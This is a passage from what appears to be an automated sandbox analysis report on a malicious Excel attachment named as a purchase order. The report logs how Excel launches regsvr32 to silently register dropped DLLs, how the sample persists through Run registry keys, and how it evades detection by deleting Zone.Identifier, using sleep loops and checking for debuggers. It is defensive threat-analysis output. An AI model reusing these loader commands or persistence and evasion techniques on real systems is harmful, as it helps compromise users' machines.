Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180017CB0 8_2_0000000180017CB0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180025CB8 8_2_0000000180025CB8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000CCB8 8_2_000000018000CCB8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800094BC 8_2_00000001800094BC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800180C8 8_2_00000001800180C8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001B4CC 8_2_000000018001B4CC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800278D8 8_2_00000001800278D8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003CD8 8_2_0000000180003CD8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001E8E4 8_2_000000018001E8E4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800258E8 8_2_00000001800258E8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800138F0 8_2_00000001800138F0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180002504 8_2_0000000180002504
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001C108 8_2_000000018001C108
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000E50C 8_2_000000018000E50C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180014514 8_2_0000000180014514
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180026518 8_2_0000000180026518
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180015120 8_2_0000000180015120
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180015524 8_2_0000000180015524
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180007130 8_2_0000000180007130
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180008D40 8_2_0000000180008D40
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002C144 8_2_000000018002C144
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000795C 8_2_000000018000795C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180001560 8_2_0000000180001560
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001C57C 8_2_000000018001C57C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000E97C 8_2_000000018000E97C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003990 8_2_0000000180003990
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800099A0 8_2_00000001800099A0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800299A4 8_2_00000001800299A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000B9B4 8_2_000000018000B9B4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180013DBC 8_2_0000000180013DBC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001FDC0 8_2_000000018001FDC0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800131C8 8_2_00000001800131C8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000D1CC 8_2_000000018000D1CC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800029CC 8_2_00000001800029CC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000B5CC 8_2_000000018000B5CC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800245D0 8_2_00000001800245D0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180014DD0 8_2_0000000180014DD0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800191E0 8_2_00000001800191E0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000FDE4 8_2_000000018000FDE4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001A9F0 8_2_000000018001A9F0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800055F4 8_2_00000001800055F4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180019E08 8_2_0000000180019E08
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000320C 8_2_000000018000320C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180011A19 8_2_0000000180011A19
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001F624 8_2_000000018001F624
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003E2C 8_2_0000000180003E2C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180013634 8_2_0000000180013634
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001BA34 8_2_000000018001BA34
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002BA3C 8_2_000000018002BA3C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180015240 8_2_0000000180015240
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180017A40 8_2_0000000180017A40
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180007658 8_2_0000000180007658
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000C65C 8_2_000000018000C65C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000FA60 8_2_000000018000FA60
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180025668 8_2_0000000180025668
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006668 8_2_0000000180006668
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180008E68 8_2_0000000180008E68
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001B670 8_2_000000018001B670
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001BE70 8_2_000000018001BE70
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000A678 8_2_000000018000A678
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001A27C 8_2_000000018001A27C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180025280 8_2_0000000180025280
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180005684 8_2_0000000180005684
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000CE88 8_2_000000018000CE88
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180021E8C 8_2_0000000180021E8C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002228C 8_2_000000018002228C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001428C 8_2_000000018001428C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180018698 8_2_0000000180018698
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180023E9C 8_2_0000000180023E9C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800016A0 8_2_00000001800016A0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800072A4 8_2_00000001800072A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000D6A4 8_2_000000018000D6A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002B6AC 8_2_000000018002B6AC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800026B0 8_2_00000001800026B0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000CAB4 8_2_000000018000CAB4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000BAD0 8_2_000000018000BAD0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001EEE0 8_2_000000018001EEE0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180025B0C 8_2_0000000180025B0C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180021B10 8_2_0000000180021B10
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003310 8_2_0000000180003310
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000E310 8_2_000000018000E310
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180027F1C 8_2_0000000180027F1C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001FF28 8_2_000000018001FF28
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180011F30 8_2_0000000180011F30
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180010330 8_2_0000000180010330
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000C334 8_2_000000018000C334
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180015344 8_2_0000000180015344
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003F54 8_2_0000000180003F54
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006B54 8_2_0000000180006B54
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180029F58 8_2_0000000180029F58
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001A764 8_2_000000018001A764
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180013B6C 8_2_0000000180013B6C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001337C 8_2_000000018001337C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180009B84 8_2_0000000180009B84
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180024788 8_2_0000000180024788
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001F388 8_2_000000018001F388
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180019B88 8_2_0000000180019B88
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000C788 8_2_000000018000C788
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001238C 8_2_000000018001238C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180023B90 8_2_0000000180023B90
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001BB98 8_2_000000018001BB98
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002B39C 8_2_000000018002B39C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000B3A4 8_2_000000018000B3A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180010BAE 8_2_0000000180010BAE
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800293B4 8_2_00000001800293B4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800167C4 8_2_00000001800167C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000AFD4 8_2_000000018000AFD4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000BBD4 8_2_000000018000BBD4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800137DC 8_2_00000001800137DC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000ABDC 8_2_000000018000ABDC
Tries to load missing DLLs
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: PO0000001552.xls Virustotal: Detection: 66%
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO0000001552.xls
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: PO0000001552.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\PO0000001552.xls
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{8FCFB94A-FCE6-4E34-A02C-69E8EC3E944A} - OProcSessId.dat Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@11/15@4/59
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B0638E8 CreateWindowExW,RegisterTouchWindow,MessageBoxW,CoCreateInstance,ShowWindow,UpdateWindow, 8_2_00007FFD2B0638E8
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: PO0000001552.xls OLE indicator, Workbook stream: true
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800274F4 FindCloseChangeNotification,Process32FirstW,CreateToolhelp32Snapshot, 8_2_00000001800274F4
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common Jump to behavior
Source: PO0000001552.xls Initial sample: OLE indicators vbamacros = False
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180005098 push ebp; ret 8_2_0000000180005099
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800118AD push esp; retn 0000h 8_2_00000001800118B5
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800170C8 push eax; retf 8_2_00000001800170C9
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800170DD push ecx; iretd 8_2_00000001800170E2
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000512B push ebp; retf 8_2_000000018000512F
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180004938 push eax; ret 8_2_000000018000493B
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800171F0 push eax; retf 8_2_00000001800171F1
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180010F42 push 8B48E1F7h; retf 8_2_0000000180010F51
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800117D6 pushad ; ret 8_2_00000001800117D8
PE file contains sections with non-standard names
Source: EvvmhfKiKFhKrSuHfBq[1].dll.0.dr Static PE information: section name: text
Source: o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll.0.dr Static PE information: section name: text
Source: elv2.ooocccxxx.0.dr Static PE information: section name: text
Source: elv3.ooocccxxx.0.dr Static PE information: section name: text
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B072AF0 DecodePointer,_errno,_invalid_parameter_noinfo,LoadLibraryW,GetProcAddress,_errno,GetLastError,_invalid_parameter_noinfo,GetLastError,EncodePointer,FreeLibrary,_errno,_errno, 8_2_00007FFD2B072AF0
PE file contains an invalid checksum
Source: elv2.ooocccxxx.0.dr Static PE information: real checksum: 0x6e4a7 should be: 0x7446f
Source: EvvmhfKiKFhKrSuHfBq[1].dll.0.dr Static PE information: real checksum: 0x6e4a7 should be: 0x7446f
Source: elv3.ooocccxxx.0.dr Static PE information: real checksum: 0x6e4a7 should be: 0x72327
Source: o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll.0.dr Static PE information: real checksum: 0x6e4a7 should be: 0x72327
Registers a DLL
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll"
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv2.ooocccxxx Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv3.ooocccxxx Jump to dropped file
Drops PE files
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv2.ooocccxxx Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\GanZhs\FrugrCuQjdEr.dll (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\XEzXl\JZazaZgAOY.dll (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv3.ooocccxxx Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\GanZhs\FrugrCuQjdEr.dll (copy) Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\XEzXl\JZazaZgAOY.dll (copy) Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv2.ooocccxxx Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv3.ooocccxxx Jump to dropped file

Boot Survival
barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\System32\regsvr32.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dll Jump to behavior
Creates multiple autostart registry keys
Source: C:\Windows\System32\regsvr32.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FrugrCuQjdEr.dll Jump to behavior
Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv2.ooocccxxx Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv3.ooocccxxx Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JZazaZgAOY.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FrugrCuQjdEr.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FrugrCuQjdEr.dll Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\XEzXl\JZazaZgAOY.dll:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\regsvr32.exe TID: 6700 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 6880 Thread sleep time: -60000s >= -30000s Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\System32\regsvr32.exe API coverage: 9.8 %
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: regsvr32.exe, 0000000A.00000003.2012380786.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2415264641.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012793437.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066471204.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066014930.00000000009FC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2415830972.0000000000A34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012356542.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066669199.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416016572.0000000000A40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW&
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B064980 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FFD2B064980
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B072AF0 DecodePointer,_errno,_invalid_parameter_noinfo,LoadLibraryW,GetProcAddress,_errno,GetLastError,_invalid_parameter_noinfo,GetLastError,EncodePointer,FreeLibrary,_errno,_errno, 8_2_00007FFD2B072AF0
